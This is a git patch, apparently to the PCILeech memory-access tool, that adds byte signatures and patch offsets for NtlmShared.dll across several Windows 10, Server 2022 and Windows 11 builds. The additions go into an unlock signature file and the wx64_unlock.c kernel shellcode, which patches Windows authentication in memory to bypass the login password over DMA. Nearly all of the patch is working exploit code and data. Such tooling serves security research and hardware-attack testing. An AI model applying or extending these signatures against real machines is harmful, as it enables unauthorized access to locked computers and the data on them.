From f3ef4bd702c758bc209423326e930ee7268cda58 Mon Sep 17 00:00:00 2001
From: ufrisk <github_ufrisk@frizk.net>
Date: Sun, 2 Apr 2023 18:59:49 +0200
Subject: [PATCH] Version 4.15.3

---
 files/unlock_win10x64.sig        |  18 +++++++++++++++-
 includes/lib64/vmm.lib           | Bin 27956 -> 28172 bytes
 includes/vmmdll.h                |   1 +
 pcileech_shellcode/wx64_unlock.c |  35 +++++++++++++++++++++++++++++--
 4 files changed, 51 insertions(+), 3 deletions(-)

diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig
index c2639a0..e4ae1e3 100644
--- a/files/unlock_win10x64.sig
+++ b/files/unlock_win10x64.sig
@@ -34,4 +34,20 @@
 741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF
 #
 # signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
-426,48FF155320,435,0F84BAFAFFFF,435,0F85
\ No newline at end of file
+426,48FF155320,435,0F84BAFAFFFF,435,0F85
+#
+# signature for Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
+4B6,48FF15C31F,4C5,0F84BAFAFFFF,4C5,0F85
+#
+# signature for Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
+A6E,48FF15B328,A7D,0F84B2FAFFFF,A7D,0F85
+#
+# signature for Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
+F8B,488BCB48FF,F9D,0F84B2FAFFFF,F9D,0F85
+#
+# signature for Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
+00B,488BCB48FF,01D,0F84B2FAFFFF,01D,0F85
+#
+# signature for Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
+# signature for Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
+FBD,48FF153C23,FCC,0F85C4FAFFFF,FCC,0F85
diff --git a/includes/lib64/vmm.lib b/includes/lib64/vmm.lib
index f4dcf2298a5219ba5d512eed5a2f6edd527c6264..65a45e9c8546be89c44779514e5e057949a08e62 100644
GIT binary patch
delta 3671
zcmb`|dr(x@9S88AW*4~ZVzh$53M?$3g2V?2ATJfcg<W=8V0piGmt}bhBC$!Qnrt*y
zGscpHpS7tmsfngZZK6pq@2SB$i3Sr;VoXC6F=>5=_~@v`G4^}*Zv3M&o#}My%x8c1
z{LZ=Op7Xos;@;s2n@&u4I?bK(K&0oN-Jggq5~cVMrA88^6%%E?CtIi^64H0dGB8#s
zd`M<~f=F1{Ez9Uazi>k47$y?xm&hC)XoGVzxy27PC}j1!FaVqpvWAt&3z$f7<#_Ez
z1Y5Vv?nflp0%djEhy?puubYTqzAP)S6L}nR<KhsJCDH2zL?~2yjUYmi(d#WlsK#VM
zO{*7nR|B;sSv3~ou?`Vx`(#ykj>mRHC~@z_kD!<3j1vh<8@+}QL7ySZokk?+UzHg*
z6AAefy*d#EEJnzy^6E!~TvWtk3=!O>H;4ptn9PI{3po*9n-C!zEBC;Iv%%nH#5iFQ
zCKnbb%a-859-kmW)}vk*5W$e<;ikne;ReW>EGzRP^1uyc!gX0G7U<D~2$e>!eTYy|
z=XDGb%DcSIAwrAJYYQT@4GDPv%a(ZUMTAy=uhobG$|SVm&<O1@Ue6*zV~DH?eL~}U
zugi$gga--D8D6^)p%@D)&JsW4UK<g?I_%Yq2$_0WT>?%uEF!N4#0Kt&o6j#S2<lB#
ztdJCq9ZP?~D<%i|6pAZiW5O(cUhm75QR?2ofIR{31$V#qhcS&$3Q=S#9*ei}UM7)l
zA<@osB7dy)p+cf3%tYPDb)kI%h8=jD^+X+ro1H`oEMXVg5x8E7>l2XUBH9hzHX=XN
zBM@;LUd~!v-*n^WGA6Yb5FLU<3(*Up#=}OySVZ&|+^j~?Yw$oY)nXE~*Fhhy6RU`}
z!`>2n12CS0LN6s6f(+DZS}xJ6h?{XjCgu}$!Z1|j;k@_bXDtSd!5b!`Ff1kqF#?lp
zg2ZgxEEtf(1pTOX@?zY)gy<7^G>hm0q@n*M<R|0WuMBy(4q>H4Jz%UP+6Q$NM8}}3
zoakIR{@&?Yh_=8`8%nthy8!=IqSY`4cI0E)iJpa!MzouV)+1hqAzWwRMC=A#F?J3c
zVc3cz1$w-~1e97Fkp{SkOCRzj6{%?@DM(3fe|m@>CIcC%kc!Am1(Z)FT1tA#rW{J7
z`{@Bnq7+J|g_tFSGRZ=@lt&9FmC`7kme69#B8ehMOOX^sI*KMgilJDVLCa|cb<%^>
zMe}JMl~NfMla)%Snrf($s;HbQ0%;D-rP-7~GiesZQ9Rv8Kj$kE(e7qyr8a7zWz<d`
zR7-VKPflte7um>84r-((nm`l(Z9o6F?HK>J{rsox%=mA%a}V+Jif}%n@a?VBj!ck0
zUael!tB<<jfA>@7fq?Md%7iukir&y$AM;4^E=4qb^$0(jI+J@-=1j!po>UFrPPw6U
zJ%8@b+dMl>%OR=tKaH9zk9b(|`SuOpa(vp|+oSy#JD0b2&S`0or|8wDpZ4c%`GML=
zuEXPDI6I*@Gi7FTj>%**J34K-u9coYD}1ytjel>QDxHhJ_e2E7X*gW(l9Ds89hi>R
zbbeCrR1{jXN4PFGlvTMFsW;4aRdj{3GuJ8IUZgq|iB<#;<~B+3AL<80OUsM$nxwrK
z4}BYsRwVDqb18O}|MLKM8)7)aP@tOg-TPn6K$ngb+!qzj>vGchd&5-K<Q*l~#4XXt
zUkRATQAV>eb<c)d;e6T{#F09Gey2W}S7!#Q`n1EJYA`YuBa0?Y<#D4)%0CrzP~>K?
zCEuaUD?2|L#!;pa{yg8J@H4jkg*TZ(xl^a)g(jo4;a8uY6Z?qcXG~71p!=<>!Dz+v
zZIex9P5#Z*NVH~S@=Pg|A2XXIzhg)G#fSv{(rlB~s$V%7iq?IcS>RCa+&9)go$s{-
z@p}cus-Zt>21F_6;_eZhhUZ!g(mh*$924W`@fwRmN`4}FSj;t_FIsHsy_>9k;uR(0
z6|vnvnA-~t(g#C^v-sbL?&psRZPMA>qa#|h9^jcpP10yk#wl@o692ZyCRv<YKaE5y
zneU));n0pgQNa{mUhGmoGS+ukht>iyb=F)Bj~APyk6wS}j@WrBTdYpi4!@#PVzp^l
z?J0FIAG4Yy_nC^X#RJkguEZu?I&3;FURDM_Q_?Q=esq06v@+4s@{G~~<tj(RXR-W4
zX*6#uEs#DgKYDr=`WK-;klke}{#jX}G{N`GH?xsl?9JLFzkR-6#3GaB$=oWdREDho
z>}D(vmWS|@G5)-&+#<F2w4WBw%Jz&Iou}f-K}x<+Zjd&u^S>Z^a=bkO+*)B$q(8Y~
zkmpoJ@i!F~Y5P&biD(SbdxnI?26)cSB}1U{@!Typ!g)$n2!B{vr2ZkG>tiu4Pt@o|
zbp$6@8C7!!-X0bOH=rtSszP{2m04x~GHpN%G<tHu9Ip0bO|?-vH1EZJQRIAXuWpf^
zKCpa9+-c(dHKBa7x<J`?^10(t{O6i*9*p(jjvAv<ap$YQ#_;^wX*@FDmtRv!oVzSZ
ze6Fgq2a7I=vtYq9qSQfbsx?XR1B?11kt^gEYn!C{4c9M-`WEq&y5)-U$12A7$GT|l
z^pp6FI-{g<PB|NgZY#PYc+^+oc$-lw%keucvL&AEb2h8`LG7wTqWq=Ub<h3b9BemB
z?{EIo0a4U4Znw8f)VF#_ETx>kvpc1vU;g2eIFA)<aoD8CcShe5txA5^VN(VT-u`<G
zKUJ^e%zCrRp|{)-Ggo5^`+Xv~7rB4TzII#`rN)z+%61<G>zoCu=eDgmABlYJ-MkNP
zcABJ(^taE%{B?ZZX_Mw`Su-wLHZE$gDNa{>a)cvX!F;&EB3biaJ1D*@2S>Xc(uy<c
zgW@dL^RHblrGEC=GokEg4CYCV1<KLkEw>{1Xya5qKl5IElS#a_El{<8%JIG^+~L9k
zR)uKzN~2l1(K_RphF@<A;p!%{6qns|PK;>cH=A12vsNy>D$YQ&I4qNrrnAeM#y>Pq
zRd4O79Ty!fqGSHFQ0{HEs4HHsJT8*0ax#JwT8xU~54N7<OD$UdU5iE0d2-Kwu4~ow
z1S?t9YEhI-?zzTCTDAO0t3^ux`koQ-=nlTp62zlPzMfjX9+Gfd)N(nN{Qa!y+|XuJ
zr8jq95F<O0b5GOo7j0(MyRLPEk;tt;E<7#_N6esl`P-*%#UR&(Tv6O~E{s$1hseJ(
QCBI+fAN1tIIicO}Us7nok^lez

delta 3507
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
T=bqje{|2hBs7UPW>7oAsZ$Fbn

diff --git a/includes/vmmdll.h b/includes/vmmdll.h
index 63f2931..a572dd2 100644
--- a/includes/vmmdll.h
+++ b/includes/vmmdll.h
@@ -186,6 +186,7 @@ VOID VMMDLL_MemFree(_Frees_ptr_opt_ PVOID pvMem);
 #define VMMDLL_OPT_CORE_VERBOSE_EXTRA                   0x4000000300000000  // RW
 #define VMMDLL_OPT_CORE_VERBOSE_EXTRA_TLP               0x4000000400000000  // RW
 #define VMMDLL_OPT_CORE_MAX_NATIVE_ADDRESS              0x4000000800000000  // R
+#define VMMDLL_OPT_CORE_LEECHCORE_HANDLE                0x4000001000000000  // R - underlying leechcore handle (do not close).
 
 #define VMMDLL_OPT_CORE_SYSTEM                          0x2000000100000000  // R
 #define VMMDLL_OPT_CORE_MEMORYMODEL                     0x2000000200000000  // R
diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c
index ff433ed..509387f 100644
--- a/pcileech_shellcode/wx64_unlock.c
+++ b/pcileech_shellcode/wx64_unlock.c
@@ -129,7 +129,7 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages
 	return E_FAIL;
 }
 
-#define NUMBER_OF_SIGNATURES 15
+#define NUMBER_OF_SIGNATURES 20
 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
 {
 	SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = {
@@ -223,7 +223,38 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
 			{.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } },
 			{.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
 			{.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } }
-		}
+		},
+		// Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889]
+		{.chunk = {
+			{.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } },
+			{.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } },
+			{.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } }
+		},
+		// Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887]
+		{.chunk = {
+			{.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } },
+			{.cbOffset = 0xa7d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
+			{.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+		},
+		// Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1]
+		{ .chunk = {
+			{.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
+			{.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
+			{.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+		},
+		// Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856]
+		{ .chunk = {
+			{.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } },
+			{.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } },
+			{.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } }
+		},
+		// Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382]
+		// Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608]
+		{ .chunk = {
+			{.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } },
+			{.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } },
+			{.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } }
+		},
 	};
 	KERNEL_FUNCTIONS2 fnk2;
 	PPHYSICAL_MEMORY_RANGE pMemMap, pMM;